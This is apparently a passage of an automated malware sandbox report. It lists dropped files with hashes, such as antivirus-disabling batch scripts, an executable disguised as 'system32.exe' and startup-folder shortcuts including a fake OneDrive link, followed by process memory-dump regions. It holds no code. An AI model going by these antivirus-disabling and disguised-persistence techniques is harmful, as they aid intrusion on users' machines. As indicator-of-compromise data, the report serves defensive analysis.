                                                        3f2401fb6c9bbf85b62deeb082e2ea699a936863

                                                        SHA256

                                                        cbc33d31c79dfe89a693a7c9d63fa546ae7ccc40514bb074c2ab61a16baa45b6

                                                        SHA512

                                                        f32061ab690ebd313d44befeef2e6ffb06b30fd3ece7a09d57aff142d0c9507562275f6efce23c9a199324ff77ed98d3641596fd80eb3e2adebcb031473dbfa8

                                                      • C:\Users\Admin\AppData\Local\Temp\avdisable.bat

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        4c35b71d2d89c8e8eb773854085c56ea

                                                        SHA1

                                                        ede16731e61348432c85ef13df4beb2be8096d9b

                                                        SHA256

                                                        3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42

                                                        SHA512

                                                        a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

                                                      • C:\Users\Admin\AppData\Local\Temp\clear_av.bat

                                                        Filesize

                                                        5KB

                                                        MD5

                                                        48d1db006fe2ae378b0f7efd561d7e56

                                                        SHA1

                                                        63df10216f0ad81d1d42dd2fc8c4483be5d077fc

                                                        SHA256

                                                        65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a

                                                        SHA512

                                                        079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5

                                                      • C:\Users\Admin\AppData\Local\Temp\system32.exe

                                                        Filesize

                                                        2.3MB

                                                        MD5

                                                        b198b92325d73a7b4994a481be7cf337

                                                        SHA1

                                                        1b1d72d1a5ac6e90c8daaa160b210903cfc76f5c

                                                        SHA256

                                                        e5c0819c18a018b6e77e27c9c7d05050dd8a45c0a2bd8ab08aaf19fff35c3c92

                                                        SHA512

                                                        d18316f3c5ef53716ba26bc01105ef4192cf94fd04e02fb3433222962649d279e8052305f101d516617821c620e8c189379f143333a6995f51de1a4f168a56a9

                                                      • C:\Users\Admin\AppData\Local\Temp\tmpF964.tmp.bat

                                                        Filesize

                                                        170B

                                                        MD5

                                                        eb4a9c331d78e31603936b9ea321129e

                                                        SHA1

                                                        9edb9750019d5563b4701f294654222a0430b6a6

                                                        SHA256

                                                        8d7016224a929f8da544c8b563dfc912cbd6c6e73cee908b913de9481df66aa9

                                                        SHA512

                                                        13b2dd5a4c6620e2ccc1f515c6b70274162d0b2aa19c75d0dc4f7adafabca7e94e84e600a3b5ce777e39ac877df88c2aba7ab8e141cdb14f61411f1e6f356682

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunCheker.lnk

                                                        Filesize

                                                        820B

                                                        MD5

                                                        40650e62796e29c1670af3b914f6286c

                                                        SHA1

                                                        2919c99d31f4feeddd080df4ee653c38269e8c3d

                                                        SHA256

                                                        a3ec00e606e03070214615664b344bea7edad0e9269ca74911c6a92094af4222

                                                        SHA512

                                                        990e9ceb0bc7d3ba08d895a6a259fb0474776f6cc3c82ffabbb0c30d6f8f5b216f2f058934185fd47e7641477f4150dcfd2d9a0a8cb4912df1ac1fae503d20ee

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk

                                                        Filesize

                                                        673B

                                                        MD5

                                                        5b36faa6bc166c530a3f899cd379fc5e

                                                        SHA1

                                                        5fe86f2e4be29a25fb5ec17496a7857ea13a8f03

                                                        SHA256

                                                        fe6f34acf5fcd97f71f7fe59ba1de77087dcd7cd689ecae237314de280aa7763

                                                        SHA512

                                                        d033e998a4ae6681a258480d796c7f970ca426c033af904a67e8b6fe74ff96057a1c9bb1581610b1dd9ef03f44f39627953169aa881be71e9766cf130dbea2d5

                                                      • memory/164-44-0x0000000007A00000-0x0000000007A9C000-memory.dmp

                                                        Filesize

                                                        624KB

                                                      • memory/164-2316-0x0000000000A80000-0x0000000001004000-memory.dmp

                                                        Filesize

                                                        5.5MB

                                                      • memory/164-2309-0x0000000000A80000-0x0000000001004000-memory.dmp

                                                        Filesize

                                                        5.5MB

                                                      • memory/164-2299-0x000000000A240000-0x000000000A24A000-memory.dmp

                                                        Filesize

                                                        40KB

                                                      • memory/164-33-0x0000000000A80000-0x0000000001004000-memory.dmp

                                                        Filesize

                                                        5.5MB

                                                      • memory/164-41-0x0000000000A80000-0x0000000001004000-memory.dmp

                                                        Filesize

                                                        5.5MB

                                                      • memory/164-39-0x0000000000A80000-0x0000000001004000-memory.dmp

                                                        Filesize

                                                        5.5MB

                                                      • memory/500-1105-0x000000006FEF0000-0x000000006FF3B000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/988-157-0x00007FFE41E90000-0x00007FFE4206B000-memory.dmp

                                                        Filesize

                                                        1.9MB

                                                      • memory/988-1-0x0000000000540000-0x0000000000BEA000-memory.dmp

                                                        Filesize

                                                        6.7MB

                                                      • memory/988-3-0x00007FFE41E90000-0x00007FFE4206B000-memory.dmp

                                                        Filesize

                                                        1.9MB

                                                      • memory/988-0-0x00007FFE41E90000-0x00007FFE4206B000-memory.dmp

                                                        Filesize

                                                        1.9MB

                                                      • memory/1240-27-0x0000000000860000-0x0000000000E4A000-memory.dmp

                                                        Filesize

                                                        5.9MB

                                                      • memory/1240-1112-0x0000000008D40000-0x0000000008D52000-memory.dmp

                                                        Filesize

                                                        72KB

                                                      • memory/1240-42-0x0000000000860000-0x0000000000E4A000-memory.dmp

                                                        Filesize

                                                        5.9MB

                                                      • memory/1240-1111-0x0000000008AE0000-0x0000000008AEA000-memory.dmp

                                                        Filesize

                                                        40KB

                                                      • memory/1240-43-0x0000000000860000-0x0000000000E4A000-memory.dmp

                                                        Filesize

                                                        5.9MB

                                                      • memory/1240-1920-0x0000000000860000-0x0000000000E4A000-memory.dmp

                                                        Filesize

                                                        5.9MB

                                                      • memory/1240-46-0x0000000007530000-0x0000000007A2E000-memory.dmp

                                                        Filesize

                                                        5.0MB

                                                      • memory/1240-45-0x0000000006F90000-0x0000000007022000-memory.dmp

                                                        Filesize

                                                        584KB

                                                      • memory/1240-577-0x00000000088E0000-0x0000000008930000-memory.dmp

                                                        Filesize

                                                        320KB

                                                      • memory/1240-578-0x0000000008840000-0x000000000885E000-memory.dmp

                                                        Filesize

                                                        120KB

                                                      • memory/2364-1341-0x000000006FEF0000-0x000000006FF3B000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/2976-1835-0x000000006FEF0000-0x000000006FF3B000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/3796-82-0x0000000009910000-0x00000000099B5000-memory.dmp

                                                        Filesize

                                                        660KB

                                                      • memory/3796-56-0x0000000007EB0000-0x0000000007ECC000-memory.dmp

                                                        Filesize

                                                        112KB

                                                      • memory/3796-57-0x0000000008910000-0x000000000895B000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/3796-52-0x0000000007CA0000-0x0000000007CC2000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/3796-54-0x0000000008030000-0x0000000008096000-memory.dmp

                                                        Filesize

                                                        408KB

                                                      • memory/3796-58-0x00000000086F0000-0x0000000008766000-memory.dmp

                                                        Filesize

                                                        472KB

                                                      • memory/3796-53-0x0000000007F20000-0x0000000007F86000-memory.dmp

                                                        Filesize

                                                        408KB

                                                      • memory/3796-55-0x0000000008140000-0x0000000008490000-memory.dmp

                                                        Filesize

                                                        3.3MB

                                                      • memory/3796-295-0x0000000009A80000-0x0000000009A88000-memory.dmp

                                                        Filesize

                                                        32KB

                                                      • memory/3796-290-0x0000000009A90000-0x0000000009AAA000-memory.dmp

                                                        Filesize

                                                        104KB

                                                      • memory/3796-83-0x0000000009AF0000-0x0000000009B84000-memory.dmp

                                                        Filesize

                                                        592KB

                                                      • memory/3796-51-0x0000000007670000-0x0000000007C98000-memory.dmp

                                                        Filesize

                                                        6.2MB

                                                      • memory/3796-77-0x00000000095B0000-0x00000000095CE000-memory.dmp

                                                        Filesize

                                                        120KB

                                                      • memory/3796-50-0x0000000006F40000-0x0000000006F76000-memory.dmp

                                                        Filesize

                                                        216KB

                                                      • memory/3796-76-0x000000006FEF0000-0x000000006FF3B000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/3796-75-0x00000000097D0000-0x0000000009803000-memory.dmp

                                                        Filesize

                                                        204KB

                                                      • memory/4056-840-0x000000006FEF0000-0x000000006FF3B000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/4332-814-0x0000000009080000-0x000000000909A000-memory.dmp

                                                        Filesize

                                                        104KB

                                                      • memory/4332-815-0x00000000090C0000-0x00000000090E2000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/4496-317-0x000000006FEF0000-0x000000006FF3B000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/4728-1577-0x000000006FEF0000-0x000000006FF3B000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/4736-2084-0x0000000009980000-0x0000000009A25000-memory.dmp

                                                        Filesize

                                                        660KB

                                                      • memory/4736-2079-0x000000006FEF0000-0x000000006FF3B000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/4876-34-0x0000000000F40000-0x0000000001500000-memory.dmp

                                                        Filesize

                                                        5.8MB

                                                      • memory/4876-47-0x0000000000F40000-0x0000000001500000-memory.dmp

                                                        Filesize

                                                        5.8MB

                                                      • memory/4876-2310-0x0000000000F40000-0x0000000001500000-memory.dmp

                                                        Filesize

                                                        5.8MB

                                                      • memory/4876-40-0x0000000000F40000-0x0000000001500000-memory.dmp

                                                        Filesize

                                                        5.8MB

                                                      • memory/4988-571-0x000000006FEF0000-0x000000006FF3B000-memory.dmp

                                                        Filesize

                                                        300KB